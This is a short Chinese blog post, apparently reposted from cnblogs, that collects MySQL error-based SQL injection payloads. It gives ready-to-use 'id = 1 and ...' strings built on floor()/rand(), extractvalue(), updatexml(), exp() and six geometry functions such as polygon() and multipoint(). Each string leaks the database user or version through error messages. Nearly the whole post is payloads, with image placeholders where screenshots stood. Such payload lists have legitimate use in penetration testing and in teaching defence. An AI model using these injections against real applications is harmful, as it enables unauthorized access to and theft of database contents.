1. 程式人生 > >SQL注入報錯注入函式彙總

SQL注入報錯注入函式彙總

1.floor()
id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)
原理:https://blog.csdn.net/qq_35544379/article/details/77453019
在這裡插入圖片描述
2.extractvalue()
id = 1 and (extractvalue(1, concat(0x5c,(select user()))))
在這裡插入圖片描述
3.updatexml()
id = 1 and (updatexml(0x3a,concat(1,(select user())),1))
在這裡插入圖片描述


4.exp()
id =1 and EXP(~(SELECT * from(select user())a))
在這裡插入圖片描述
5.有六種函式(但總的來說可以歸為一類)
GeometryCollection()
id = 1 AND GeometryCollection((select * from (select * from(select user())a)b))
polygon()
id =1 AND polygon((select * from(select * from(select user())a)b))
multipoint()
id = 1 AND multipoint((select * from(select * from(select user())a)b))
multilinestring()

id = 1 AND multilinestring((select * from(select * from(select user())a)b))
linestring()
id = 1 AND LINESTRING((select * from(select * from(select user())a)b))
multipolygon()
id =1 AND multipolygon((select * from(select * from(select user())a)b))

轉自:https://www.cnblogs.com/Dleo/p/5493782.html